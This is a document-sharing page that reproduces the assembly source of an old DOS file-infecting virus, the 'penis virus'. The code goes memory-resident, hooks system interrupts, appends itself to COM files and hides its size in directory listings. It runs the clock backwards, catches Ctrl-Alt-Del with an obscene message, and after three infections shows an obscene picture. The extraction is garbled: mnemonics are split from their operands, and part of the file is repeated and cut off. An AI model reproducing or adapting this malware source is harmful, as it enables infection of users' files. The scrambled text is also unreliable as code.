Penis
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Penis as PDF for free.
More details
- Words: 2,842
- Pages: 13
;***************************************************************************** ;* the penis virus ;* ;* ;* by soltan griss [yam] ;* ;* ;* ;* ;* in no means was this intended to be a serious virus, i got bored one day ;* and decided to have some fun. ;* ;* ;* well here it is... ;* ;***************************************************************************** seg_a segment assume cs:seg_a,ds:seg_a,es:nothing start:
org db
100h 0e9h,02,00,42h,0f2h
mov mov call
cx,(old_21-old_8) si,offset old_8 crypter
mov mov call
cx,(exec-data) si,offset data crypter
;run first time only ;encrypt all text messages
vstart
equ $ call code_start code_start: pop si sub si,offset code_start mov bp,si jmp load ;load in the tsr ;************************************************************************** old_8
dw
0,0
new_8:
push push push push xor mov mov mov dec jno dec jno mov mov
ax bx cx ds ax,ax ds,ax bx,ds:46ch cx,ds:046eh bx loc_4 cx loc_4 bx,0afh cx,18h
dec
bx
loc_4:
;lets run the clock ;backwards
;remember to do it twice ;cause the normal increase ;will negate the first one
loc_5:
do_old_8:
jno dec jno mov mov
loc_5 cx loc_5 bx,0afh cx,18h
mov mov pop pop pop pop jmp
ds:046eh,cx ds:046ch,bx ds cx bx ax dword ptr cs:[old_8-vstart]
;**************************************************************************** ;int 9 handler old_9
dd
?
;store old int 9
push in cmp
ax al,60h al,53h
;turn on register 60 ;ctrl-alt-del
je pop jmp
fuck_you ax dword ptr cs:[(old_9-vstart)]
new_9:
say_it: db
"fuck you asshole!
fuck_you: push push mov
ds dx ah,9h
push pop
cs ds
mov int pop pop pop iret
dx,say_it-vstart 21h dx ds ax
","$"
;say message
;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** old_21 new_21:
dd
?
cmp je cmp je cmp je cmp jne mov do_old: jmp exec1: jmp do_dir: jmp ret hide_size: pushf push call cmp jnz
ax,4b00h exec1 ah,11h hide_size ah,12h hide_size ax,0f242h do_old bx,242fh dword ptr cs:[(old_21-vstart)] exec dword ptr cs:[(old_21-vstart)]
cs do_dir al,00h dir_error
push push push mov int mov cmp jnz mov mov push mov int pop inc jnz add normal_fcb: mov and xor jnz
ax bx es ah,51h 21h es,bx bx,es:[16h] not_inf bx,dx al,[bx] ax ah,2fh 21h ax al normal_fcb bx,7h
and sub sbb not_inf:pop pop pop
byte ptr es:[bx+17h],0e0h es:[bx+1dh],(vend-vstart) es:[bx+1fh],ax es bx ax
dir_error: iret
ax,es:[bx+17h] ax,1fh al,01h not_inf
;are we executing?
;are we going resident? ;set our residency byte ;if not then do old int 21
;get the current fcb ;jump if bad fcb
;undocumented get fcb ;location ;get info from fcb
;get dta ;check for extended fcb
;check for 2 seconds ;subtract virus size
;back to caller
;*************************************************************************** ;***************************************************************************
;* picture to display ;*************************************************************************** data
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
'?',4,'?',4,'?',4,'?',4,' ',4,' ',15,'?',4,' ',15,' ' 15,' ',15,' ',15,'?',4,'?',4,'?',4,'?',4,' ',15,'?',4 '?',4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',4 '?',4,' ',15,' ',15,'?',4,' ',15,' ',15,' ',15,' ',15 ' ',15,'?',4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?' 64,' ',15,' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',64,' ',15,' ',15,' ',15 ' ',64,'?',64,' ',64,' ',15,' ',15,' ',15,' ',15,' ',64 ' ',15,' ',15,' ',64,' ',15,' ',15,' ',64,'?',4,' ',15 ' ',15,' ',15,' ',15,'?',4,' ',64,' ',4,' ',15,' ',15 '?',4,'?',4,'?',4,' ',15,'?',64,' ',64,'?',4,' ',15,'?' 4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ' 0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' ',15,' ',0 ' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',64,'?',64,'?',64,'?',64,'?',64,'?',64,' ' 64,' ',15,' ',15,' ',15,' ',15,' ',64,' ',15,' ',15,' ' 64,' ',15,' ',15,' ',15,' ',64,'?',4,' ',64,' ',64,'?' 64,' ',64,' ',4,' ',15,' ',15,' ',15,'?',4,' ',15,'?' 4,'?',4,'?',4,' ',15,'?',4,' ',15,'?',4,'?',64,'?',64 '?',64,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' ' 0,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',64,'?',4 '?',4,'?',4,'?',64,' ',15,' ',64,'?',4,'?',4,'?',4,' ' 15,' ',64,'?',4,'?',4,' ',64,' ',15,' ',15,' ',15,' ' 15,' ',64,' ',15,' ',15,' ',64,' ',15,' ',15,' ',15,' ' 15,' ',15,'?',4,' ',15,' ',15,'?',4,' ',15,' ',15,'?' 4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?',64,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',0,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,'?',96,'?',96,'?',96,' ',96,'?',96,'?' 96,'?',96,'?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?'
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
15,'?',15,'?',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',96,' ',96,' ',96 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',96,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,' ',103 ' ',103,' ',103,' ',103,' ',103,' ',103,' ',103,'?',96 '?',96,'?',96,'?',96,' ',96,'?',96,'?',96,'?',15,'?',15 '?',15,'?',15,'?',15,'?',15,' ',15,' ',15,' ',15,' ',15 '?',15,'?',15,'?',15,'?',15,'?',15,'?',15,'?',15,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',96,' ',96,' ',96,' ',96,' ',103,' ',103,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,' ',96,'?',96,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,'?',15,'?',15,'?',15,' ',15,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',96,' ',103,' ',103,' ',96,' ',96,' ',103,'?',96 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',103,' ',103,' ',103,'?',96,'?',96,'?',96,' ' 103,'?',96,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',103,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103 '?',96,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',103,'?',96,'?',96,'?',96,'?',96,' ',103,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' '
doggie
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,'?',96,' ',103,' ',103,' ',103,'?',96,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',0,' ',0,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 15,'y',15,'o',15,'u',15,'r',15,' ',15,'f',15,'i',15,'l',15,'e' 15,' ',15,'h',15,'a',15,'s',15,' ',15,'j',15,'u',15,'s',15,'t' 15,' ',15,'b',15,'e',15,' ',15,'p',15,'e',15,'n',15,'i',15,'s' 15,'`',15,'i',15,'z',15,'e',15,'d',15,' ',15,'c',15,'o',15,'m'
db db db db db db db db ;actual program
15,'p',15,'l',15,'e',15,'m',15,'e',15,'n',15,'t',15,'s',15,' ' 15,'o',15,'f',15,' ',15,' ',15,' ' 0,' ',0,' ',15,' ',15,' ',15,' ' 03,'[',03,'y',03,'a',03,'m' 03,']',03,'/',03,'9',03,'2' 03,' ',02,'-',04,'s',04,'.',04,'g',04,'r',04,'i',04,'s',04,'s' 04,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0 begins here
exec: push push push push push push push push
ax bx cx dx di si ds es
mov int jc
ax,4300h 21h long_cock
;get file attributes
and mov int jc
cl,0feh ax,4301h 21h long_cock
;make it read/write
mov int jc
ax,3d02h 21h long_cock
mov
bx,ax
push push pop
ds cs ds
mov mov mov int jc
ah,3fh cx,5h dx,(buffer-vstart) 21h long_cock
cmp je
word ptr cs:[(buffer-vstart)],5a4dh ;check to see if its an long_cock ;exe
cmp je
word ptr cs:[(buffer-vstart)+3],42f2h long_cock ;check to see if f242 tag ;if so then its infected next
infect:
jmp
;load in the first 5 bytes
long_cock: jmp
cocker2
next: mov int
ax,5700h 21h
mov mov
word ptr cs:[(old_time-vstart)],cx word ptr cs:[(old_date-vstart)],dx
mov xor xor int jc mov sub mov
ax,4202h ;move file pointer to end cx,cx ;top get the files size dx,dx 21h long_cock cx,ax cx,3 ;sub 3 form jump at begining word ptr cs:[(jump_add+1-vstart)],cx;save length in jmp commmand
mov mov call
cx,(old_21-old_8) ;number of bytes to encrypt before writing si,(old_8-vstart) crypter
mov mov call
cx,(exec-data) si,(data-vstart) crypter
mov mov push
ah,byte ptr cs:[(infect_times-vstart)] byte ptr cs:[(infect_times-vstart)],00h ax
mov mov xor int jc
cx,(vend-vstart) ah,40h dx,dx 21h cocker
pop inc mov
ax ah byte ptr cs:[(infect_times-vstart)],ah ;counter
mov mov call
cx,(exec-data) si,(data-vstart) crypter
mov mov call
cx,(old_21-old_8) ;number of bytes to decrypt after writing si,(old_8-vstart) crypter
mov xor
ax,4200h cx,cx
;get the files time ;and date
;write the virus to the end ;of the file
;decrypt data
;move file pointer to the ;begining to write the jmp
xor int
dx,dx 21h
mov mov mov int
cx,5 ah,40h dx,(jump_add-vstart) 21h
jc
cocker
mov mov mov
ax,5701h word ptr cx,cs:[(old_time-vstart)] word ptr dx,cs:[(old_date-vstart)]
;restore old time,date
and inc int
cl,0e0h cl 21h
;change seconds to 2
mov int
ah,3eh 21h
jmp cocker: jmp
;write the jmp top the file
show_dick cocker2
show_dick:
mono: doit:
counter
screen
cmp jl
byte ptr cs:[(infect_times-vstart)],03h cocker
mov int cmp jz mov jmp mov mov
ah,0fh 010h al,7 mono ax,0b800h short doit ax, 0b000h es,ax
push pop mov xor
cs ds si,data-vstart di,di
;load destination offset ;clear destination index
mov rep
cx,(exec-data+1)/2 movsw
;write to video memory
mov mov mov
ah,02h bh,0 dx,1a00h
;hide cursor ;assume video page 0 ;moves cursor past bottom of
int
010h
;get current video mode ;is it a monochrome mode? ;yes ;color text video segment ;monochrome text video segment
lup:
mov int jz mov int
ah, 01h 016h lup ah,0 016h
;clear the screen mov ah, 6 mov al, 0 mov bh, 7 mov ch, 0 mov cl, 0 mov dh, 25 mov dl, 80 int 10h mov mov mov int
cocker2:pop pop pop pop pop pop pop pop pop jmp
ah,02h bh,0 dx,0 010h
ds es ds si di dx cx bx ax
;function 6 (scroll window up) ;blank entire screen ;attribute to use ;starting row ;starting column ;ending row ;ending column ;call interrupt 10h ;puts cursor back where it belongs ;assume video page 0
;go back to old int 21
dword ptr cs:[(old_21-vstart)]
old_date dw old_time dw
0 0
buffer: db buffer2 db infect_times: jump_add: db
0cdh,20h,00 0,0 db 0h 0e9h,00,00,0f2h,42h;
;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** exit2: jmp crypter: push loo: mov xor mov inc
exit ax ah,byte ptr cs:[si] ah,0aah byte ptr cs:[si],ah si
;encryptor routine ;move byte into ah ;xor it ;write it back
loop pop ret load:
loo ax
mov int cmp je
ax,0f242h 21h bx,0242fh exit2
; check to see if we are ; allready resident ; looking for f242 tag
mov mov add call
cx,(old_21-old_9) si,offset old_9 si,bp crypter
;number of bytes to decrypt
mov mov add call
cx,(exec-data) si,offset data si,bp crypter
;number of bytes to decrypt
dec_here: push pop
cs ds
mov int
ah,49h 21h
;release current memory block
mov mov int
ah,48h bx,0ffffh 21h
;request hugh size of memory ;returns biggest size
mov sub jc int
ah,4ah bx,(vend-vstart+15)/16+1 exit2 21h
mov mov int jc
ah,48h bx,(vend-vstart+15)/16 21h exit2
dec
ax
push
es
mov
es,ax
mov mov mov sub
byte word word word
inc
ax
ptr ptr ptr ptr
;subtract virus size
;request last xxx pages ;allocate it to virus
es:[0],'z' ;make dos the owner es:[1],8 es:[3],(vend-vstart+15)/16 ;put size here es:[12h],(vend-vstart+15)/16 ;sub size from current ;memory
lea xor mov mov cld rep
si,[bp+offset vstart] di,di es,ax cx,(vend-vstart+5)/2
;copy it to new memory block
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[21h*4] word ptr es:[old_21-vstart],ax word ptr es:[old_21-vstart+2],ds ds word ptr ds:[21h*4],(new_21-vstart) ds:[21h*4+2],es
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[9h*4] word ptr es:[old_9-vstart],ax word ptr es:[old_9-vstart+2],ds ds word ptr ds:[9h*4],(new_9-vstart) ds:[9h*4+2],es
xor mov push lds mov mov pop mov mov
ax,ax ds,ax ds ax,ds:[8h*4] word ptr es:[old_8-vstart],ax word ptr es:[old_8-vstart+2],ds ds word ptr ds:[8h*4],(new_8-vstart) ds:[8h*4+2],es
push pop
cs ds
push pop
cs es
movsw
exit:
; now got to copy it back......
;swap vectors manually
vend
mov mov add mov repne
cx,5 si,offset buffer si,bp di,100h movsb
mov jmp
bp,100h bp
equ
$
seg_a end
ends start
;copy it back and run original ;program
org db
100h 0e9h,02,00,42h,0f2h
mov mov call
cx,(old_21-old_8) si,offset old_8 crypter
mov mov call
cx,(exec-data) si,offset data crypter
;run first time only ;encrypt all text messages
vstart
equ $ call code_start code_start: pop si sub si,offset code_start mov bp,si jmp load ;load in the tsr ;************************************************************************** old_8
dw
0,0
new_8:
push push push push xor mov mov mov dec jno dec jno mov mov
ax bx cx ds ax,ax ds,ax bx,ds:46ch cx,ds:046eh bx loc_4 cx loc_4 bx,0afh cx,18h
dec
bx
loc_4:
;lets run the clock ;backwards
;remember to do it twice ;cause the normal increase ;will negate the first one
loc_5:
do_old_8:
jno dec jno mov mov
loc_5 cx loc_5 bx,0afh cx,18h
mov mov pop pop pop pop jmp
ds:046eh,cx ds:046ch,bx ds cx bx ax dword ptr cs:[old_8-vstart]
;**************************************************************************** ;int 9 handler old_9
dd
?
;store old int 9
push in cmp
ax al,60h al,53h
;turn on register 60 ;ctrl-alt-del
je pop jmp
fuck_you ax dword ptr cs:[(old_9-vstart)]
new_9:
say_it: db
"fuck you asshole!
fuck_you: push push mov
ds dx ah,9h
push pop
cs ds
mov int pop pop pop iret
dx,say_it-vstart 21h dx ds ax
","$"
;say message
;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** ;*********************************************************************** old_21 new_21:
dd
?
cmp je cmp je cmp je cmp jne mov do_old: jmp exec1: jmp do_dir: jmp ret hide_size: pushf push call cmp jnz
ax,4b00h exec1 ah,11h hide_size ah,12h hide_size ax,0f242h do_old bx,242fh dword ptr cs:[(old_21-vstart)] exec dword ptr cs:[(old_21-vstart)]
cs do_dir al,00h dir_error
push push push mov int mov cmp jnz mov mov push mov int pop inc jnz add normal_fcb: mov and xor jnz
ax bx es ah,51h 21h es,bx bx,es:[16h] not_inf bx,dx al,[bx] ax ah,2fh 21h ax al normal_fcb bx,7h
and sub sbb not_inf:pop pop pop
byte ptr es:[bx+17h],0e0h es:[bx+1dh],(vend-vstart) es:[bx+1fh],ax es bx ax
dir_error: iret
ax,es:[bx+17h] ax,1fh al,01h not_inf
;are we executing?
;are we going resident? ;set our residency byte ;if not then do old int 21
;get the current fcb ;jump if bad fcb
;undocumented get fcb ;location ;get info from fcb
;get dta ;check for extended fcb
;check for 2 seconds ;subtract virus size
;back to caller
;*************************************************************************** ;***************************************************************************
;* picture to display ;*************************************************************************** data
db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db db
'?',4,'?',4,'?',4,'?',4,' ',4,' ',15,'?',4,' ',15,' ' 15,' ',15,' ',15,'?',4,'?',4,'?',4,'?',4,' ',15,'?',4 '?',4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',4 '?',4,' ',15,' ',15,'?',4,' ',15,' ',15,' ',15,' ',15 ' ',15,'?',4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?' 64,' ',15,' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15 ' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',64,' ',15,' ',15,' ',15 ' ',64,'?',64,' ',64,' ',15,' ',15,' ',15,' ',15,' ',64 ' ',15,' ',15,' ',64,' ',15,' ',15,' ',64,'?',4,' ',15 ' ',15,' ',15,' ',15,'?',4,' ',64,' ',4,' ',15,' ',15 '?',4,'?',4,'?',4,' ',15,'?',64,' ',64,'?',4,' ',15,'?' 4,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ' 0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' ',15,' ',0 ' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',64,'?',64,'?',64,'?',64,'?',64,'?',64,' ' 64,' ',15,' ',15,' ',15,' ',15,' ',64,' ',15,' ',15,' ' 64,' ',15,' ',15,' ',15,' ',64,'?',4,' ',64,' ',64,'?' 64,' ',64,' ',4,' ',15,' ',15,' ',15,'?',4,' ',15,'?' 4,'?',4,'?',4,' ',15,'?',4,' ',15,'?',4,'?',64,'?',64 '?',64,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15,' ' 0,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0 ' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',64,'?',4 '?',4,'?',4,'?',64,' ',15,' ',64,'?',4,'?',4,'?',4,' ' 15,' ',64,'?',4,'?',4,' ',64,' ',15,' ',15,' ',15,' ' 15,' ',64,' ',15,' ',15,' ',64,' ',15,' ',15,' ',15,' ' 15,' ',15,'?',4,' ',15,' ',15,'?',4,' ',15,' ',15,'?' 4,' ',15,'?',4,'?',4,'?',4,'?',4,'?',64,'?',64,' ',15 ' ',0,' ',0,' ',0,' ',15,' ',0,' ',15,' ',15,' ',15,' ' 15,' ',0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ',0,' ' 0,' ',0,' ',0,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,'?',96,'?',96 '?',96,'?',96,'?',96,'?',96,'?',96,'?',96,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15,' ',15 ' ',0,' ',15,' ',15,' ',15,' ',15,' 